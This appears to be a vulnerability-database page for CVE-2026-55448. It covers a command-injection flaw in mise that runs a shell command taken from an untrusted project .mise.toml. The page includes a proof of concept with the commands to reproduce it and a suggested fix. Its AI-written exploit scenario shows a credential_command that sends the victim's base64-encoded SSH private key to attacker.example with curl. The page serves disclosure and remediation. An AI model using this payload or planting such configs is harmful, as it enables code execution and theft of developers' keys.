Skip to main content

mise CVE-2026-55448

| EUVDEUVD-2026-39813 MEDIUM
OS Command Injection (CWE-78)
2026-06-23 https://github.com/jdx/mise GHSA-29hf-rm4x-xxph
6.3
CVSS 3.1 · Vendor: https://github.com/jdx/mise
Share

Severity by source

Vendor (https://github.com/jdx/mise) PRIMARY
6.3 MEDIUM
AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
vuln.today AI
6.3 MEDIUM

AV:L because execution is triggered locally on the victim's machine; AC:H because GITHUB_TOKEN must be absent; UI:R because the victim must run a mise command; no availability impact demonstrated.

3.1 AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
4.0 AV:L/AC:H/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

Primary rating from Vendor (https://github.com/jdx/mise).

CVSS VectorVendor: https://github.com/jdx/mise

CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
Attack Vector
Local
Attack Complexity
High
Privileges Required
None
User Interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None

Lifecycle Timeline

3
Source Code Evidence Fetched
Jun 23, 2026 - 19:02 vuln.today
Analysis Generated
Jun 23, 2026 - 19:02 vuln.today
CVE Published
Jun 23, 2026 - 18:24 github-advisory
MEDIUM 6.3

DescriptionCVE.org

Summary

mise loads github.credential_command from local project config before any trust decision, then executes that value with sh -c when resolving a GitHub token. An attacker who can place a .mise.toml in a repository can execute arbitrary shell commands when the victim runs a GitHub-related mise command and no higher-priority GitHub token environment variable is set.

The current command-execution path is github.credential_command. I confirmed in Docker that the setting is exploitable on v2026.3.15 and v2026.3.17, while v2026.3.14 rejects it as an unknown field. This report does not depend on the separate trust-bypass issue because the sink is reached directly from [settings.github].

Details

The vulnerable load order is:

  1. Settings::try_get() preloads settings from local config files.
  2. parse_settings_file() returns settings_file.settings without checking whether the local file is trusted.
  3. resolve_token() checks settings.github.credential_command after the token env vars and before file-based sources.
  4. get_credential_command_token() executes the value with sh -c.

The main command-execution path is:

rust
let result = std::process::Command::new("sh")
    .arg("-c")
    .arg(cmd)
    .arg("mise-credential-helper")
    .arg(host)
    .output()

If a local project file sets:

toml
[settings.github]
credential_command = "echo credential_command_rce > /tmp/mise-proof.txt; echo ghp_fake_token"

then resolve_token() will reach get_credential_command_token() whenever higher-priority GitHub token environment variables are unset. credential_command is a documented custom credential source for mise, but it is also accepted from a local project .mise.toml, which lets an untrusted repository supply a shell command for mise to execute.

PoC

Test environment:

  • Docker
  • linux-arm64
  • mise v2026.3.17

Negative control:

bash
export GITHUB_TOKEN=env_token
mise github token --unmask

Observed:

text
github.com: env_token (source: GITHUB_TOKEN)
/tmp/mise-proof.txt => missing

Primary exploit:

toml
[settings.github]
credential_command = "echo credential_command_rce > /tmp/mise-proof.txt; echo ghp_fake_token"

Run:

bash
unset GITHUB_TOKEN GITHUB_API_TOKEN MISE_GITHUB_TOKEN MISE_GITHUB_ENTERPRISE_TOKEN
mise github token --unmask

Observed:

text
github.com: ghp_fake_token (source: credential_command)

And the side effect file is created:

text
/tmp/mise-proof.txt => credential_command_rce

Related version check:

  • v2026.3.14: credential_command is rejected as an unknown field
  • v2026.3.15: the same PoC executes and returns source: credential_command

Impact

An attacker who can place a .mise.toml in a repository can execute arbitrary shell commands as the victim user when the victim runs a mise command that resolves a GitHub token from local settings.

Demonstrated impact:

  • arbitrary command execution as the victim user
  • no trust prompt
  • no need for [env], [hooks], tasks, or templates

Important limitation:

  • if a higher-priority GitHub token environment variable is already set, the credential_command path is not reached

Suggested Fix

Do not honor github.credential_command from non-global project config files.

For example, inside parse_settings_file():

rust
pub fn parse_settings_file(path: &Path) -> Result<SettingsPartial> {
    let raw = file::read_to_string(path)?;
    let settings_file: SettingsFile = toml::from_str(&raw)?;
    let mut settings = settings_file.settings;

    if !config::is_global_config(path) {
        settings.github.credential_command = None;
    }

    Ok(settings)
}

AnalysisAI

Command injection in mise's GitHub credential resolver executes attacker-controlled shell commands on the victim developer's machine when a malicious .mise.toml is placed in a repository and no higher-priority GitHub token environment variable is set. Versions v2026.3.15 through v2026.3.17 (and all releases up to < 2026.6.4) pass github.credential_command from untrusted local project config directly to sh -c without any trust verification. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Attacker commits malicious `.mise.toml` to repository
Delivery
Victim clones repository without auditing config
Exploit
Victim runs mise GitHub-related command with no GITHUB_TOKEN set
Execution
mise loads credential_command from untrusted local config without trust check
Persist
sh -c executes attacker-controlled shell payload
Impact
Arbitrary commands run as victim user

Vulnerability AssessmentAI

Exploitation Three conditions must all be true simultaneously: (1) the victim is running mise v2026.3.15 or later and < 2026.6.4; (2) the victim runs a mise command that triggers GitHub token resolution (e.g., `mise github token` or fetching a GitHub-authenticated resource); and (3) none of the four higher-priority environment variables - GITHUB_TOKEN, GITHUB_API_TOKEN, MISE_GITHUB_TOKEN, or MISE_GITHUB_ENTERPRISE_TOKEN - is set in the victim's shell environment at the time of execution. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 score of 6.3 (AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N) correctly captures the real-world constraints. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker commits a `.mise.toml` containing `[settings.github] credential_command = "curl http://attacker.example/exfil?key=$(cat ~/.ssh/id_rsa | base64); echo ghp_fake"` to a public or shared repository. When a developer clones the repository and runs any mise command that triggers GitHub token resolution - such as `mise github token` - without a GITHUB_TOKEN environment variable set, mise executes the attacker-supplied shell command with the developer's full user privileges. …
Remediation Upgrade mise to version 2026.6.4 or later, which restricts `github.credential_command` to global config files only, per the vendor advisory at https://github.com/jdx/mise/security/advisories/GHSA-29hf-rm4x-xxph. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in Docker

View all
CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2019-5736 HIGH POC
8.6 Feb 11

runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac

CVE-2023-32077 HIGH POC
7.5 Aug 24

Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2023-5815 HIGH POC
8.1 Nov 22

The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post

CVE-2014-9357 CRITICAL
10.0 Dec 16

Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build

CVE-2026-34156 CRITICAL POC
9.9 Mar 30

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l

CVE-2019-15752 HIGH POC
7.8 Aug 28

Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c

CVE-2025-34221 CRITICAL POC
10.0 Sep 29

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2

CVE-2024-23054 CRITICAL POC
9.8 Feb 05

An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du

CVE-2025-23211 CRITICAL POC
9.9 Jan 28

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve

CVE-2026-46339 CRITICAL POC
10.0 May 19

Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at

Share

CVE-2026-55448 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy